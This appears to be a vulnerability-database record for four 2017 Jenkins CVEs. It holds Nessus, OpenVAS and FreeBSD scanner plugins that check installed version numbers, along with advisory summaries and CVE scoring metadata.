{"id": "JENKINS_2_57.NASL", "bulletinFamily": "scanner", "title": "Jenkins < 2.46.2 / 2.57 and Jenkins Enterprise < 1.625.24.1 / 1.651.24.1 / 2.7.24.0.1 / 2.46.2.1 Multiple Vulnerabilities", "description": "The version of Jenkins running on the remote web server is prior to\n2.57 or is a version of Jenkins LTS prior to 2.46.2, or else it is\na version of Jenkins Enterprise that is 1.625.x.y prior to 1.625.24.1,\n1.651.x.y prior to 1.651.24.1, 2.7.x.0.y prior to 2.7.24.0.1, or\n2.x.y.z prior to 2.46.2.1. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A remote code execution vulnerability exists within\n core/src/main/java/jenkins/model/Jenkins.java that\n allows an untrusted serialized Java SignedObject to be\n transfered to the remoting-based Jenkins CLI and\n deserialized using a new ObjectInputStream. By using a\n specially crafted request, an unauthenticated, remote\n attacker can exploit this issue to bypass existing\n blacklist protection mechanisms and execute arbitrary\n code. (CVE-2017-1000353)\n\n - A flaw exists in the remoting-based CLI, specifically in\n the ClientAuthenticationCache.java class, when storing\n the encrypted username of a successfully authenticated\n user in a cache file that is used to authenticate\n further commands. An authenticated, remote attacker who\n has sufficient permissions to create secrets in Jenkins\n and download their encrypted values can exploit this\n issue to impersonate any other Jenkins user on the same\n instance. (CVE-2017-1000354)\n\n - A denial of service vulnerability exists in the XStream\n library. An authenticated, remote attacker who has\n sufficient permissions, such as creating or configuring\n items, views or jobs, can exploit this to crash the Java\n process by using specially crafted XML content.\n (CVE-2017-1000355)\n\n - Cross-site request forgery (XSRF) vulnerabilities exist\n within multiple Java classes due to a failure to require\n multiple steps, explicit confirmation, or a unique token\n when performing certain sensitive actions. An\n unauthenticated, remote attacker can exploit these to\n perform several administrative actions by convincing a\n user into opening a specially crafted web page.\n (CVE-2017-1000356)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "published": "2017-05-04T00:00:00", "modified": "2021-03-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/99984", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://jenkins.io/security/advisory/2017-04-26/", "http://www.nessus.org/u?9c6d83db", "https://www.cloudbees.com/cloudbees-security-advisory-2017-04-26"], "cvelist": ["CVE-2017-1000355", "CVE-2017-1000354", "CVE-2017-1000356", "CVE-2017-1000353"], "type": "nessus", "lastseen": "2021-03-01T03:35:25", "edition": 33, "viewCount": 162, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310107156", "OPENVAS:1361412562310107157"]}, {"type": "freebsd", "idList": ["631C4710-9BE5-4A80-9310-EB2847FE24DD"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_631C47109BE54A809310EB2847FE24DD.NASL"]}, {"type": "cve", "idList": ["CVE-2017-1000353", "CVE-2017-1000356", "CVE-2017-1000354", "CVE-2017-1000355"]}, {"type": "attackerkb", "idList": ["AKB:5A79A3DC-D4D7-4FF8-BE45-A4E658714412"]}, {"type": "archlinux", "idList": ["ASA-201704-8"]}, {"type": "seebug", "idList": ["SSV:93063", "SSV:93062", "SSV:93065", "SSV:93064"]}, {"type": "exploitdb", "idList": ["EDB-ID:41965"]}, {"type": "threatpost", "idList": ["THREATPOST:BE009076F7BB03DF3F38AEAC53E3DE88", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159266"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/JENKINS_CLI_DESERIALIZATION"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:49C18614AD01B6865616A65F734B9F71"]}, {"type": "kitploit", "idList": ["KITPLOIT:5420210148456420402"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7"]}], "modified": "2021-03-01T03:35:25", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-03-01T03:35:25", "rev": 2}, "vulnersScore": 5.7}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99984);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-1000353\",\n \"CVE-2017-1000354\",\n \"CVE-2017-1000355\",\n \"CVE-2017-1000356\"\n );\n script_bugtraq_id(\n 98056,\n 98062,\n 98065,\n 98066\n );\n\n script_name(english:\"Jenkins < 2.46.2 / 2.57 and Jenkins Enterprise < 1.625.24.1 / 1.651.24.1 / 2.7.24.0.1 / 2.46.2.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Jenkins version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A job scheduling and management system hosted on the remote web server\nis affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Jenkins running on the remote web server is prior to\n2.57 or is a version of Jenkins LTS prior to 2.46.2, or else it is\na version of Jenkins Enterprise that is 1.625.x.y prior to 1.625.24.1,\n1.651.x.y prior to 1.651.24.1, 2.7.x.0.y prior to 2.7.24.0.1, or\n2.x.y.z prior to 2.46.2.1. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A remote code execution vulnerability exists within\n core/src/main/java/jenkins/model/Jenkins.java that\n allows an untrusted serialized Java SignedObject to be\n transfered to the remoting-based Jenkins CLI and\n deserialized using a new ObjectInputStream. By using a\n specially crafted request, an unauthenticated, remote\n attacker can exploit this issue to bypass existing\n blacklist protection mechanisms and execute arbitrary\n code. (CVE-2017-1000353)\n\n - A flaw exists in the remoting-based CLI, specifically in\n the ClientAuthenticationCache.java class, when storing\n the encrypted username of a successfully authenticated\n user in a cache file that is used to authenticate\n further commands. An authenticated, remote attacker who\n has sufficient permissions to create secrets in Jenkins\n and download their encrypted values can exploit this\n issue to impersonate any other Jenkins user on the same\n instance. (CVE-2017-1000354)\n\n - A denial of service vulnerability exists in the XStream\n library. An authenticated, remote attacker who has\n sufficient permissions, such as creating or configuring\n items, views or jobs, can exploit this to crash the Java\n process by using specially crafted XML content.\n (CVE-2017-1000355)\n\n - Cross-site request forgery (XSRF) vulnerabilities exist\n within multiple Java classes due to a failure to require\n multiple steps, explicit confirmation, or a unique token\n when performing certain sensitive actions. An\n unauthenticated, remote attacker can exploit these to\n perform several administrative actions by convincing a\n user into opening a specially crafted web page.\n (CVE-2017-1000356)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.cloudbees.com/cloudbees-security-advisory-2017-04-26\");\n script_set_attribute(attribute:\"see_also\", value:\"https://jenkins.io/security/advisory/2017-04-26/\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade Jenkins to version 2.57 or later, Jenkins LTS to version\n2.46.2 or later, or Jenkins Enterprise to version 1.625.24.1 /\n1.651.24.1 / 2.7.24.0.1 / 2.46.2.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-1000353\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cloudbees:jenkins\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"jenkins_detect.nasl\");\n script_require_keys(\"www/Jenkins\");\n script_require_ports(\"Services/www\", 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\nget_kb_item_or_exit(\"www/Jenkins/\"+port+\"/Installed\");\nurl = build_url(qs:'/', port:port);\n\nversion = '';\nfix = '';\nif (get_kb_item(\"www/Jenkins/\"+port+\"/enterprise/Installed\"))\n{\n appname = \"Jenkins Enterprise by CloudBees\";\n version = get_kb_item(\"www/Jenkins/\"+port+\"/enterprise/CloudBeesVersion\");\n\n if (version =~ \"^1\\.651\\.\")\n {\n fix = '1.651.24.1';\n }\n else if (version =~ \"^1\\.625\\.\" )\n {\n fix = '1.625.24.1';\n }\n else if (version =~ \"^2\\.7\\.\" )\n {\n fix = '2.7.24.0.1';\n }\n else\n {\n fix = '2.46.2.1';\n }\n}\nelse\n{\n if (get_kb_item(\"www/Jenkins/\"+port+\"/is_LTS\") )\n {\n appname = \"Jenkins Open Source LTS\";\n fix = '2.46.2';\n }\n else\n {\n appname = \"Jenkins Open Source\";\n fix = '2.57';\n }\n\n version = get_kb_item(\"www/Jenkins/\" + port + \"/JenkinsVersion\");\n if (version == 'unknown')\n {\n audit(AUDIT_UNKNOWN_WEB_APP_VER, appname, url);\n }\n}\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n report =\n '\\n URL : ' + url +\n '\\n Product : ' + appname +\n '\\n Version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report, xsrf:TRUE);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, url, version);\n", "naslFamily": "CGI abuses", "pluginID": "99984", "cpe": ["cpe:/a:cloudbees:jenkins"], "scheme": null, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}

{"openvas": [{"lastseen": "2019-10-18T15:20:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000355", "CVE-2017-1000354", "CVE-2017-1000356", "CVE-2017-1000353"], "description": "Multiple Cross-Site Request Forgery vulnerabilities in Jenkins allow malicious users to\n perform several administrative actions by tricking a victim into opening a web page.", "modified": "2019-10-17T00:00:00", "published": "2017-04-28T00:00:00", "id": "OPENVAS:1361412562310107156", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107156", "type": "openvas", "title": "Jenkins Multiple Vulnerabilities - Apr17 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jenkins Multiple Vulnerabilities - Apr17 (Linux)\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107156\");\n script_version(\"2019-10-17T11:27:19+0000\");\n script_tag(name:\"last_modification\", value:\"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-04-28 12:09:09 +0200 (Fri, 28 Apr 2017)\");\n script_cve_id(\"CVE-2017-1000353\", \"CVE-2017-1000354\", \"CVE-2017-1000355\", \"CVE-2017-1000356\");\n script_bugtraq_id(98056);\n\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_name(\"Jenkins Multiple Vulnerabilities - Apr17 (Linux)\");\n\n script_tag(name:\"summary\", value:\"Multiple Cross-Site Request Forgery vulnerabilities in Jenkins allow malicious users to\n perform several administrative actions by tricking a victim into opening a web page.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to:\n\n - multiple Cross-Site Request Forgery vulnerabilities.\n\n - the storage of the encrypted user name in a cache file which is used to authenticate further commands.\n\n - XStream library which allow anyone able to provide XML to Jenkins for processing using XStream to crash the Java process.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows attackers to:\n\n - perform several administrative actions by tricking a victim into opening a web page.execute arbitrary code in the context\n of the affected application.\n\n - to transfer a serialized Java SignedObject object to the remoting-based Jenkins CLI, that would be deserialized using a new\n ObjectInputStream, bypassing the existing blacklist-based protection mechanism.\n\n - impersonate any other Jenkins user on the same instance.\n\n - crash the Java process.\");\n\n script_tag(name:\"affected\", value:\"Jenkins main line 2.56 and prior, Jenkins LTS 2.46.1 and prior.\");\n\n script_tag(name:\"solution\", value:\"Jenkins main line users should update to 2.57,\n Jenkins LTS users should update to 2.46.2.\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/98056\");\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2017-04-26/\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/detected\", \"Host/runs_unixoide\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit(0);\n\nif( ! infos = get_app_full( cpe:CPE, port:port ) )\n exit(0);\n\nif( ! version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif( get_kb_item( \"jenkins/\" + port + \"/is_lts\" ) ) {\n if( version_is_less( version:version, test_version:\"2.46.2\" ) ) {\n vuln = TRUE;\n fix = \"2.46.2\";\n }\n} else {\n if( version_is_less( version:version, test_version:\"2.57\" ) ) {\n vuln = TRUE;\n fix = \"2.57\";\n }\n}\n\nif( vuln ) {\n report = report_fixed_ver( installed_version:version, fixed_version:fix, install_path:location );\n security_message( port:port, data:report, proto:proto );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-18T15:16:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000355", "CVE-2017-1000354", "CVE-2017-1000356", "CVE-2017-1000353"], "description": "Multiple Cross-Site Request Forgery vulnerabilities in Jenkins allow malicious users to\n perform several administrative actions by tricking a victim into opening a web page.", "modified": "2019-10-17T00:00:00", "published": "2017-04-28T00:00:00", "id": "OPENVAS:1361412562310107157", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107157", "type": "openvas", "title": "Jenkins Multiple Vulnerabilities - Apr17 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jenkins Multiple Vulnerabilities - Apr17 (Windows)\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107157\");\n script_version(\"2019-10-17T11:27:19+0000\");\n script_tag(name:\"last_modification\", value:\"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-04-28 12:09:09 +0200 (Fri, 28 Apr 2017)\");\n script_cve_id(\"CVE-2017-1000353\", \"CVE-2017-1000354\", \"CVE-2017-1000355\", \"CVE-2017-1000356\");\n script_bugtraq_id(98056);\n\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_name(\"Jenkins Multiple Vulnerabilities - Apr17 (Windows)\");\n\n script_tag(name:\"summary\", value:\"Multiple Cross-Site Request Forgery vulnerabilities in Jenkins allow malicious users to\n perform several administrative actions by tricking a victim into opening a web page.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to:\n\n - multiple Cross-Site Request Forgery vulnerabilities.\n\n - the storage of the encrypted user name in a cache file which is used to authenticate further commands.\n\n - XStream library which allow anyone able to provide XML to Jenkins for processing using XStream to crash the Java process.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows attackers to:\n\n - perform several administrative actions by tricking a victim into opening a web page.execute arbitrary code in the context\n of the affected application.\n\n - to transfer a serialized Java SignedObject object to the remoting-based Jenkins CLI, that would be deserialized using a new\n ObjectInputStream, bypassing the existing blacklist-based protection mechanism.\n\n - impersonate any other Jenkins user on the same instance.\n\n - crash the Java process.\");\n\n script_tag(name:\"affected\", value:\"Jenkins main line 2.56 and prior, Jenkins LTS 2.46.1 and prior.\");\n\n script_tag(name:\"solution\", value:\"Jenkins main line users should update to 2.57,\n Jenkins LTS users should update to 2.46.2.\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/98056\");\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2017-04-26/\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/detected\", \"Host/runs_windows\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit(0);\n\nif( ! infos = get_app_full( cpe:CPE, port:port ) )\n exit(0);\n\nif( ! version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif( get_kb_item( \"jenkins/\" + port + \"/is_lts\" ) ) {\n if( version_is_less( version:version, test_version:\"2.46.2\" ) ) {\n vuln = TRUE;\n fix = \"2.46.2\";\n }\n} else {\n if( version_is_less( version:version, test_version:\"2.57\" ) ) {\n vuln = TRUE;\n fix = \"2.57\";\n }\n}\n\nif( vuln ) {\n report = report_fixed_ver( installed_version:version, fixed_version:fix, install_path:location );\n security_message( port:port, data:report, proto:proto );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-06T10:52:41", "description": "Jenkins Security Advisory : DescriptionSECURITY-412 through\nSECURITY-420 / CVE-2017-1000356 CSRF: Multiple vulnerabilities\nSECURITY-429 / CVE-2017-1000353 CLI: Unauthenticated remote code\nexecution SECURITY-466 / CVE-2017-1000354 CLI: Login command allowed\nimpersonating any Jenkins user SECURITY-503 / CVE-2017-1000355\nXStream: Java crash when trying to instantiate void/Void", "edition": 23, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-04-27T00:00:00", "title": "FreeBSD : jenkins -- multiple vulnerabilities (631c4710-9be5-4a80-9310-eb2847fe24dd)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000355", "CVE-2017-1000354", "CVE-2017-1000356", "CVE-2017-1000353"], "modified": "2017-04-27T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:jenkins", "p-cpe:/a:freebsd:freebsd:jenkins-lts"], "id": "FREEBSD_PKG_631C47109BE54A809310EB2847FE24DD.NASL", "href": "https://www.tenable.com/plugins/nessus/99698", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99698);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-1000353\", \"CVE-2017-1000354\", \"CVE-2017-1000355\", \"CVE-2017-1000356\");\n\n script_name(english:\"FreeBSD : jenkins -- multiple vulnerabilities (631c4710-9be5-4a80-9310-eb2847fe24dd)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Jenkins Security Advisory : DescriptionSECURITY-412 through\nSECURITY-420 / CVE-2017-1000356 CSRF: Multiple vulnerabilities\nSECURITY-429 / CVE-2017-1000353 CLI: Unauthenticated remote code\nexecution SECURITY-466 / CVE-2017-1000354 CLI: Login command allowed\nimpersonating any Jenkins user SECURITY-503 / CVE-2017-1000355\nXStream: Java crash when trying to instantiate void/Void\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://jenkins.io/security/advisory/2017-04-26/\"\n );\n # https://vuxml.freebsd.org/freebsd/631c4710-9be5-4a80-9310-eb2847fe24dd.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3062337c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Jenkins CLI Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:jenkins-lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"jenkins<2.57\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"jenkins-lts<2.46.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:17", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000355", "CVE-2017-1000354", "CVE-2017-1000356", "CVE-2017-1000353"], "description": "\nJenkins Security Advisory:\n\nDescription\nSECURITY-412 through SECURITY-420 / CVE-2017-1000356\nCSRF: Multiple vulnerabilities\nSECURITY-429 / CVE-2017-1000353\nCLI: Unauthenticated remote code execution\nSECURITY-466 / CVE-2017-1000354\nCLI: Login command allowed impersonating any Jenkins user\nSECURITY-503 / CVE-2017-1000355\nXStream: Java crash when trying to instantiate void/Void\n\n", "edition": 5, "modified": "2017-04-26T00:00:00", "published": "2017-04-26T00:00:00", "id": "631C4710-9BE5-4A80-9310-EB2847FE24DD", "href": "https://vuxml.freebsd.org/freebsd/631c4710-9be5-4a80-9310-eb2847fe24dd.html", "title": "jenkins -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2021-02-02T06:36:31", "description": "Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to a login command which allowed impersonating any Jenkins user. The `login` command available in the remoting-based CLI stored the encrypted user name of the successfully authenticated user in a cache file used to authenticate further commands. Users with sufficient permission to create secrets in Jenkins, and download their encrypted values (e.g. with Job/Configure permission), were able to impersonate any other Jenkins user on the same instance.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-29T17:29:00", "title": "CVE-2017-1000354", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 